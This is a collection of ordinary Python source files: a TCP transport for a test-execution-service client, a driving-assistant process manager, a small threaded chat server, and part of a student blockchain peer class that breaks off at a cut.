try: oWakeupW.shutdown(socket.SHUT_WR);
except: reporter.logXcpt();
oWakeupW.close();
self.oCv.release();
def _connectAsServer(self, oSocket, oWakeupR, cMsTimeout):
""" Connects to the TXS server as server, i.e. the reversed setup. """
assert(self.fReversedSetup);
reporter.log2('TransportTcp::_connectAsServer: oSocket=%s, cMsTimeout=%u' % (oSocket, cMsTimeout));
# Workaround for bind() failure...
try:
oSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);
except:
reporter.errorXcpt('socket.listen(1) failed');
return None;
# Bind the socket and make it listen.
try:
oSocket.bind((self.sHostname, self.uPort));
except:
reporter.errorXcpt('socket.bind((%s,%s)) failed' % (self.sHostname, self.uPort));
return None;
try:
oSocket.listen(1);
except:
reporter.errorXcpt('socket.listen(1) failed');
return None;
# Accept connections.
oClientSocket = None;
tClientAddr = None;
try:
(oClientSocket, tClientAddr) = oSocket.accept();
except socket.error as e:
if not self.__isInProgressXcpt(e):
raise;
# Do the actual waiting.
reporter.log2('TransportTcp::accept: operation in progress (%s)...' % (e,));
try:
select.select([oSocket, oWakeupR], [], [oSocket, oWakeupR], cMsTimeout / 1000.0);
except socket.error as e:
if e[0] != errno.EBADF or not self.fConnectCanceled:
raise;
reporter.log('socket.select() on accept was canceled');
return None;
except:
reporter.logXcpt('socket.select() on accept');
# Try accept again.
try:
(oClientSocket, tClientAddr) = oSocket.accept();
except socket.error as e:
if not self.__isInProgressXcpt(e):
if e[0] != errno.EBADF or not self.fConnectCanceled:
raise;
reporter.log('socket.accept() was canceled');
return None;
reporter.log('socket.accept() timed out');
return False;
except:
reporter.errorXcpt('socket.accept() failed');
return None;
except:
reporter.errorXcpt('socket.accept() failed');
return None;
# Store the connected socket and throw away the server socket.
self.oCv.acquire();
if not self.fConnectCanceled:
self.oSocket.close();
self.oSocket = oClientSocket;
self.sHostname = "%s:%s" % (tClientAddr[0], tClientAddr[1]);
self.oCv.release();
return True;
def _connectAsClient(self, oSocket, oWakeupR, cMsTimeout):
""" Connects to the TXS server as client. """
assert(not self.fReversedSetup);
# Connect w/ timeouts.
rc = None;
try:
oSocket.connect((self.sHostname, self.uPort));
rc = True;
except socket.error as oXcpt:
iRc = oXcpt.errno;
if self.__isInProgressXcpt(oXcpt):
# Do the actual waiting.
reporter.log2('TransportTcp::connect: operation in progress (%s)...' % (oXcpt,));
try:
ttRc = select.select([oWakeupR], [oSocket], [oSocket, oWakeupR], cMsTimeout / 1000.0);
if len(ttRc[1]) + len(ttRc[2]) == 0:
raise socket.error(errno.ETIMEDOUT, 'select timed out');
iRc = oSocket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR);
rc = iRc == 0;
except socket.error as oXcpt2:
iRc = oXcpt2.errno;
except:
iRc = -42;
reporter.fatalXcpt('socket.select() on connect failed');
if rc is True:
pass;
elif iRc == errno.ECONNREFUSED \
or iRc == errno.EHOSTUNREACH \
or iRc == errno.EINTR \
or iRc == errno.ENETDOWN \
or iRc == errno.ENETUNREACH \
or iRc == errno.ETIMEDOUT:
rc = False; # try again.
else:
if iRc != errno.EBADF or not self.fConnectCanceled:
reporter.fatalXcpt('socket.connect((%s,%s)) failed; iRc=%s' % (self.sHostname, self.uPort, iRc));
reporter.log2('TransportTcp::connect: rc=%s iRc=%s' % (rc, iRc));
except:
reporter.fatalXcpt('socket.connect((%s,%s)) failed' % (self.sHostname, self.uPort));
return rc;
def connect(self, cMsTimeout):
# Create a non-blocking socket.
reporter.log2('TransportTcp::connect: cMsTimeout=%s sHostname=%s uPort=%s' % (cMsTimeout, self.sHostname, self.uPort));
try:
oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0);
except:
reporter.fatalXcpt('socket.socket() failed');
return None;
try:
oSocket.setblocking(0);
except:
oSocket.close();
reporter.fatalXcpt('socket.socket() failed');
return None;
# Create wakeup socket pair for unix (select doesn't wake up on socket close on Linux).
oWakeupR = None;
oWakeupW = None;
if hasattr(socket, 'socketpair'):
try: (oWakeupR, oWakeupW) = socket.socketpair(); # pylint: disable=E1101
except: reporter.logXcpt('socket.socketpair() failed');
# Update the state.
self.oCv.acquire();
rc = None;
if not self.fConnectCanceled:
self.oSocket = oSocket;
self.oWakeupW = oWakeupW;
self.oWakeupR = oWakeupR;
self.fIsConnecting = True;
self.oCv.release();
# Try connect.
if oWakeupR is None:
oWakeupR = oSocket; # Avoid select failure.
if self.fReversedSetup:
rc = self._connectAsServer(oSocket, oWakeupR, cMsTimeout);
else:
rc = self._connectAsClient(oSocket, oWakeupR, cMsTimeout);
oSocket = None;
# Update the state and cleanup on failure/cancel.
self.oCv.acquire();
if rc is True and self.fConnectCanceled:
rc = False;
self.fIsConnecting = False;
if rc is not True:
if self.oSocket is not None:
self.oSocket.close();
self.oSocket = None;
self._closeWakeupSockets();
self.oCv.release();
reporter.log2('TransportTcp::connect: returning %s' % (rc,));
return rc;
def disconnect(self, fQuiet = False):
if self.oSocket is not None:
self.abReadAhead = array.array('B');
# Try a shutting down the socket gracefully (draining it).
try:
self.oSocket.shutdown(socket.SHUT_WR);
except:
if not fQuiet:
reporter.error('shutdown(SHUT_WR)');
try:
self.oSocket.setblocking(0); # just in case it's not set.
sData = "1";
while sData:
sData = self.oSocket.recv(16384);
except:
pass;
# Close it.
self.oCv.acquire();
try: self.oSocket.setblocking(1);
except: pass;
self.oSocket.close();
self.oSocket = None;
else:
self.oCv.acquire();
self._closeWakeupSockets();
self.oCv.release();
def sendBytes(self, abBuf, cMsTimeout):
if self.oSocket is None:
reporter.error('TransportTcp.sendBytes: No connection.');
return False;
# Try send it all.
try:
cbSent = self.oSocket.send(abBuf);
if cbSent == len(abBuf):
return True;
except Exception as oXcpt:
if not self.__isWouldBlockXcpt(oXcpt):
reporter.errorXcpt('TranportTcp.sendBytes: %s bytes' % (len(abBuf)));
return False;
cbSent = 0;
# Do a timed send.
msStart = base.timestampMilli();
while True:
cMsElapsed = base.timestampMilli() - msStart;
if cMsElapsed > cMsTimeout:
reporter.error('TranportTcp.sendBytes: %s bytes timed out (1)' % (len(abBuf)));
break;
# wait.
try:
ttRc = select.select([], [self.oSocket], [self.oSocket], (cMsTimeout - cMsElapsed) / 1000.0);
if ttRc[2] and not ttRc[1]:
reporter.error('TranportTcp.sendBytes: select returned with exception');
break;
if not ttRc[1]:
reporter.error('TranportTcp.sendBytes: %s bytes timed out (2)' % (len(abBuf)));
break;
except:
reporter.errorXcpt('TranportTcp.sendBytes: select failed');
break;
# Try send more.
try:
cbSent += self.oSocket.send(abBuf[cbSent:]);
if cbSent == len(abBuf):
return True;
except Exception as oXcpt:
if not self.__isWouldBlockXcpt(oXcpt):
reporter.errorXcpt('TranportTcp.sendBytes: %s bytes' % (len(abBuf)));
break;
return False;
def __returnReadAheadBytes(self, cb):
""" Internal worker for recvBytes. """
assert(len(self.abReadAhead) >= cb);
abRet = self.abReadAhead[:cb];
self.abReadAhead = self.abReadAhead[cb:];
return abRet;
def recvBytes(self, cb, cMsTimeout, fNoDataOk):
if self.oSocket is None:
reporter.error('TransportTcp.recvBytes(%s,%s): No connection.' % (cb, cMsTimeout));
return None;
# Try read in some more data without bothering with timeout handling first.
if len(self.abReadAhead) < cb:
try:
abBuf = self.oSocket.recv(cb - len(self.abReadAhead));
if abBuf:
self.abReadAhead.extend(array.array('B', abBuf));
except Exception as oXcpt:
if not self.__isWouldBlockXcpt(oXcpt):
reporter.errorXcpt('TranportTcp.recvBytes: 0/%s bytes' % (cb,));
return None;
if len(self.abReadAhead) >= cb:
return self.__returnReadAheadBytes(cb);
# Timeout loop.
msStart = base.timestampMilli();
while True:
cMsElapsed = base.timestampMilli() - msStart;
if cMsElapsed > cMsTimeout:
if not fNoDataOk or self.abReadAhead:
reporter.error('TranportTcp.recvBytes: %s/%s bytes timed out (1)' % (len(self.abReadAhead), cb));
break;
# Wait.
try:
ttRc = select.select([self.oSocket], [], [self.oSocket], (cMsTimeout - cMsElapsed) / 1000.0);
if ttRc[2] and not ttRc[0]:
reporter.error('TranportTcp.recvBytes: select returned with exception');
break;
if not ttRc[0]:
if not fNoDataOk or self.abReadAhead:
reporter.error('TranportTcp.recvBytes: %s/%s bytes timed out (2) fNoDataOk=%s'
% (len(self.abReadAhead), cb, fNoDataOk));
break;
except:
reporter.errorXcpt('TranportTcp.recvBytes: select failed');
break;
# Try read more.
try:
abBuf = self.oSocket.recv(cb - len(self.abReadAhead));
if not abBuf:
reporter.error('TranportTcp.recvBytes: %s/%s bytes (%s) - connection has been shut down'
% (len(self.abReadAhead), cb, fNoDataOk));
self.disconnect();
return None;
self.abReadAhead.extend(array.array('B', abBuf));
except Exception as oXcpt:
reporter.log('recv => exception %s' % (oXcpt,));
if not self.__isWouldBlockXcpt(oXcpt):
if not fNoDataOk or not self.__isConnectionReset(oXcpt) or self.abReadAhead:
reporter.errorXcpt('TranportTcp.recvBytes: %s/%s bytes (%s)' % (len(self.abReadAhead), cb, fNoDataOk));
break;
# Done?
if len(self.abReadAhead) >= cb:
return self.__returnReadAheadBytes(cb);
#reporter.log('recv => None len(self.abReadAhead) -> %d' % (len(self.abReadAhead), ));
return None;
def isConnectionOk(self):
if self.oSocket is None:
return False;
try:
ttRc = select.select([], [], [self.oSocket], 0.0);
if ttRc[2]:
return False;
self.oSocket.send(array.array('B')); # send zero bytes.
except:
return False;
return True;
def isRecvPending(self, cMsTimeout = 0):
try:
ttRc = select.select([self.oSocket], [], [], cMsTimeout / 1000.0);
if not ttRc[0]:
return False;
except:
pass;
return True;
def openTcpSession(cMsTimeout, sHostname, uPort = None, fReversedSetup = False, cMsIdleFudge = 0):
"""
Opens a connection to a Test Execution Service via TCP, given its name.
"""
reporter.log2('openTcpSession(%s, %s, %s, %s, %s)' % \
(cMsTimeout, sHostname, uPort, fReversedSetup, cMsIdleFudge));
try:
oTransport = TransportTcp(sHostname, uPort, fReversedSetup);
oSession = Session(oTransport, cMsTimeout, cMsIdleFudge);
except:
reporter.errorXcpt(None, 15);
return None;
return oSession;
def tryOpenTcpSession(cMsTimeout, sHostname, uPort = None, fReversedSetup = False, cMsIdleFudge = 0):
"""
Tries to open a connection to a Test Execution Service via TCP, given its name.
This differs from openTcpSession in that it won't log a connection failure
as an error.
"""
try:
oTransport = TransportTcp(sHostname, uPort, fReversedSetup);
oSession = Session(oTransport, cMsTimeout, cMsIdleFudge, fTryConnect = True);
except:
reporter.errorXcpt(None, 15);
return None;
return oSession;
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import subprocess
import datetime
from selfdrive.dragonpilot.dragonconf import dragonpilot_set_params
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1170
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
if os.path.isfile('/EON'):
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
else:
from common.spinner import FakeSpinner as Spinner
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
scons = subprocess.Popen(["scons", "-j4"], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (50.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
print(line.decode('utf8'))
except Exception:
pass
if scons.returncode != 0:
if retry:
print("scons build failed, make clean")
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
else:
raise RuntimeError("scons build failed")
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.swaglog import cloudlog
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_frame
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"monitoringd": ("selfdrive/modeld", ["./monitoringd"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"dashcamd": "selfdrive.dragonpilot.dashcamd.dashcamd",
"shutdownd": "selfdrive.dragonpilot.shutdownd.shutdownd",
"appd": "selfdrive.dragonpilot.appd.appd",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'updated',
'shutdownd',
'appd',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'monitoringd',
'proclogd',
'ubloxd',
'gpsd',
'deleter',
'dashcamd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param)
if pid is not None:
try:
os.kill(int(pid), 0)
# process is running (kill is a poorly-named system call)
return
except OSError:
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
# running[name].join(5.0)
t = time.time()
while time.time() - t < 5 and running[name].exitcode is None:
time.sleep(0.001)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
start_frame()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 50.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("CommunityFeaturesToggle") is None:
params.put("CommunityFeaturesToggle", "0")
if params.get("CompletedTrainingVersion") is None:
params.put("CompletedTrainingVersion", "0")
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("HasCompletedSetup") is None:
params.put("HasCompletedSetup", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsLdwEnabled") is None:
params.put("IsLdwEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
if params.get("LastUpdateTime") is None:
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if params.get("OpenpilotEnabledToggle") is None:
params.put("OpenpilotEnabledToggle", "1")
dragonpilot_set_params(params)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
if params.get("DragonEnableLogger", encoding='utf8') == "0":
del managed_processes['loggerd']
del managed_processes['tombstoned']
if params.get("DragonEnableUploader", encoding='utf8') == "0":
del managed_processes['uploader']
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
server.py
|
#!/usr/bin/env python3
"""Server for multithreaded (asynchronous) chat application."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the server. you are connected now", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,client_address,)).start()
def handle_client(client, client_address): # Takes client socket as argument.
"""Handles a single client connection."""
name, x = client_address
name = str(name)+ " "+ str(x)
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % str(name)
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % str(name)
broadcast(bytes(msg, "utf8"))
clients[client] = client_address
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
print(msg.decode("utf-8"))
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message tso all the clients."""
for sock in clients:
#print(sock)
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.bind(ADDR)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
|
peer.py
|
# peer.py - CS 60 Spring 2021
# Final Project - George McNulty, Karimi Itani, Boxian Wang, Gabe Kotsonis
# May 25th, 2021
#
# This progam creates the class Peer, which is a client side program using UDP that helps implement the p2p aspect
# of the larger blockchain project. It interacts with the tracker which helps it communicate with the other peers in the network.
# import libraries
from socket import *
from threading import Thread, Lock
from blockchain import Blockchain
from block import Block
import time
import json
class Peer:
# NEED self_addr (for p2p) and tracker_addr to initialize
def __init__(self, self_addr=('babylon1.thayer.dartmouth.edu', 60806),
tracker_addr=('babylon1.thayer.dartmouth.edu', 60825), data_crit=lambda new_data, all_data: True):
# Blockchain, start with genesis
self.blockchain = Blockchain()
self.chain_lock = Lock()
# Peer List
self.peer_list = []
self.peer_lock = Lock()
# Threads
self.tracker_thread = Thread(target=self.listen_from_tracker)
self.peer_thread = Thread(target=self.listen_from_peers)
# Address of the tracker, and address of itself (for p2p)
self.tracker_addr = tracker_addr
self.self_addr = self_addr
# Variable to stop threads
self.stop = False
self.stop_lock = Lock()
# Function for controlling data addition
self.data_crit = data_crit
################### EXPOSED API #######################
def connect(self):
# start tracking thread
self.tracker_sock = socket(AF_INET, SOCK_STREAM)
self.tracker_thread.start()
time.sleep(0.5) # sleep to make sure thread got peer list before doing p2p
# start listening thread
self.peer_sock = socket(AF_INET, SOCK_DGRAM)
self.peer_sock.bind(self.self_addr)
self.peer_thread.start()
print("**Peer listening for messages**")
def disconnect(self):
# change stop to true
self.stop_lock.acquire()
self.stop = True
self.stop_lock.release()
# wait for threads to die
self.tracker_thread.join()
self.peer_thread.join()
print("**Peer disconencted**")
def get_data(self):
# get lock
self.chain_lock.acquire()
# return list
res = self.blockchain.get_data()
# release lock
self.chain_lock.release()
return res
def add_data(self, data):
# get lock, get hash, length
self.chain_lock.acquire()
prev_hash = self.blockchain.get_last_hash()
length = self.blockchain.get_length()
all_data = self.blockchain.get_data() # exclude the genesis block!
# release lock
self.chain_lock.release()
if not self.data_crit(data, all_data): return -1
# start mining
res = []
self.mining_thread = Thread(target=self.mine, args=(data, prev_hash, length, res))
self.mining_thread.start()
print("**Mining block**")
# wait for finish and retrieve resulting block
self.mining_thread.join()
new_block = res[0]
# get lock
self.chain_lock.acquire()
# check validity
if self.blockchain.verify_block(new_block):
print("**Block Verified, broadcasting...**")
# publicize new block
self.blockchain.add_block(new_block)
self.chain_lock.release()
self.broadcast_block(new_block)
return 1
else:
print("Verify failed; chain changed during mining")
# return failure
self.chain_lock.release()
return 0
#################### THREADS ##############################
# content of tracking thread, listens from tracker and update peer list
def listen_from_tracker(self):
# send SYN and my address
print("**Peer connectected to tracker**")
syn_msg = {'type': 'SYN', 'addr': self.self_addr}
self.tracker_sock.connect(self.tracker_addr)
self.tracker_sock.send(json.dumps(syn_msg).encode())
# listen; update peer list; wait for at most 5 seconds
self.tracker_sock.settimeout(5)
print("**Peer now listening to tracker**")
while True:
try:
track_msg = json.loads(self.tracker_sock.recv(1500).decode())
self.peer_lock.acquire()
self.peer_list = [tuple (i) for i in track_msg] # acquire lock and update peer list
self.peer_lock.release()
except timeout: # check if we disconnected
self.stop_lock.acquire()
stop = self.stop
self.stop_lock.release()
if stop:
break
# send FIN
fin_msg = {'type': 'FIN', 'addr': self.self_addr}
self.tracker_sock.send(json.dumps(fin_msg).encode())
print("**Peer disconnected from tracker**")
# close connection
self.tracker_sock.shutdown(SHUT_RDWR)
self.tracker_sock.close()
def listen_from_peers(self):
# First request a copy of blockchain, start by finding a peer (if any)
valid_peer = None
self.peer_lock.acquire()
for p in self.peer_list:
if p != self.self_addr:
valid_peer = p
self.peer_lock.release()
# ask it for blockchain
if valid_peer is not None:
self.send_req(valid_peer)
# Then start handling messages; wait for at most 5 seconds
self.peer_sock.settimeout(5)
while True:
try:
packet, addr = self.peer_sock.recvfrom(65536)
peer_msg = json.loads(packet.decode())
# if got a block
if peer_msg['type'] == 'BLOCK':
print("**Received a block from peer " + addr[0] + "**")
new_block = Block.load_json(peer_msg['data'])
self.chain_lock.acquire()
# accept, or request entire chain, based on verification
if self.blockchain.verify_block(new_block) and self.data_crit(new_block.get_data(), self.blockchain.get_data()):
self.blockchain.add_block(new_block)
self.chain_lock.release()
print("**New block accepted**")
else:
self.chain_lock.release()
print("**New block does not match; sending request for whole chain**")
self.send_req(addr)
# if got a chain
elif peer_msg['type'] == 'CHAIN':
print("**Received a chain from peer " + addr[0] + "**")
new_chain = Blockchain.load_json(peer_msg['data'])
self.chain_lock.acquire()
# accept if new chain is longer and valid
if new_chain.verify_chain() and self.data_crit(None, new_chain.get_data()) and new_chain.get_length() > self.blockchain.get_length():
print("**New chain accepted**")
self.blockchain = new_chain
else:
print("**New chain rejected**")
self.chain_lock.release()
# if got a request
elif peer_msg['type'] == 'REQ':
print("**Received a request from peer " + addr[0] + "**")
self.send_blockchain(addr)
except timeout:
# check for stoppage
self.stop_lock.acquire()
stop = self.stop
self.stop_lock.release()
if stop:
break
# clean up
self.peer_sock.close()
# mining thread, simply invoke Blockchain.mineblock
def mine(self, data, prev_hash, length, res):
